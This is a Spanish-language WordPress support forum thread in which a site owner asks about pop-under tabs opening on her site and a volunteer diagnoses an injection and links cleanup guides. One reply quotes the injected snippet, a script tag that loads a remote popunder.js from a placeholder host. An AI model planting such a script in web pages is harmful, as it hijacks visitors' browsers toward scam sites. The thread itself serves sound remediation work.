VIRUS DESCONOCIDO EN MI WEB

Amaia
(@amaiaesteban)

hace 1 año, 11 meses

Hola comunidad,
Cuando entras en la web por primera vez y pinchas en cualquier sitio (no hace falta que sea enlace) se abre una nueva pestaña ajena a la web.

He seguido los pasos de limpieza recomendados pero me sigue apareciendo. En la base de datos no he encontrado nada. A ver si a alguna mente privilegiada se le ocurre por donde puedo tirar.

Gracias de antemano

La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 4 respuestas - de la 1 a la 4 (de un total de 4)

Javier Casares
(@javiercasares)

hace 1 año, 11 meses
Hay una inyección de código… si te fijas en el código fuente de la página principal, al principio de todo se ha incluido un código como este:
```
< script >
var popunder = {expire: 1, url: "https://example.com/?u=mr1kd0x&o=f5pp7z3&t=p&cid=1h6bjh78p6mbh0"};
</ script >
< script src="https://example.com/js/popunder.js" >< /script >
```
Es muy probable que sea algún plugin o algo que tenga problemas. Lo ideal será, no simplemente sobrescribir todos los componentes del WordPress, sino ir eliminando esa partes y sustituirlas por una versión oficial actualizada.
Iniciador del debate Amaia
(@amaiaesteban)

hace 1 año, 11 meses

No sé pero yo no veo ese script, he probado a borrar la cache, diferente navegación y no loo veo. Aún y todo te agradezco porque gracias a tu aportación he dado con lo que pasa en este post:
https://blog.sucuri.net/2022/04/wordpress-popunder-malware-redirects-to-scam-sites.html

Ahora a intentar solucionarlo no sé si lo conseguiré 😉

Iniciador del debate Amaia
(@amaiaesteban)

hace 1 año, 11 meses

Ya he conseguido ver el script pero nada, sigo sin ver el código en los archivos.Por lo que he leído se suele poner en el footer pero nada, ni rastro. También he mirado en la base de datos y nada. Mi gozo en un pozo @javiercasares

Javier Casares
(@javiercasares)

hace 1 año, 11 meses

En principio, siguiendo los manuales debería funcionar.

Prueba con el que hay aquí en los foros.

https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/

Si ves que no funciona, puedes probar otros como:

https://www.wpsysadmin.com/seguridad/especial/limpiar/

Uno, específico, que podría ser para lo que te ocurre, es este:

https://www.wpsysadmin.com/blog/2019/12/13/wordpress-hackeado-con-redireccion/

De todas formas, el planteamiento es sustituir el código <script por algo como <scr1pt.

En cualquier caso, vaciar carpetas, sustituir ficheros, tanto del core, como de temas, como de plugins, y poner versiones actualizadas de todo, y debería funciona.

También puedes usar alguna herramienta del tipo antivirus:

https://www.wpsysadmin.com/blog/2021/03/25/antivirus-wordpress/

o un sistema contra malware

https://www.wpsysadmin.com/extra/awscan/

Si tienes más pistas, dime e intento darte algún elemento mucho más concreto.

Viendo 4 respuestas - de la 1 a la 4 (de un total de 4)

El debate ‘VIRUS DESCONOCIDO EN MI WEB’ está cerrado a nuevas respuestas.

Etiquetas

Debates

Debates populares

Debates sin respuestas

Debates que no son soporte

Debates resueltos

Debates no resueltos

Todos los debates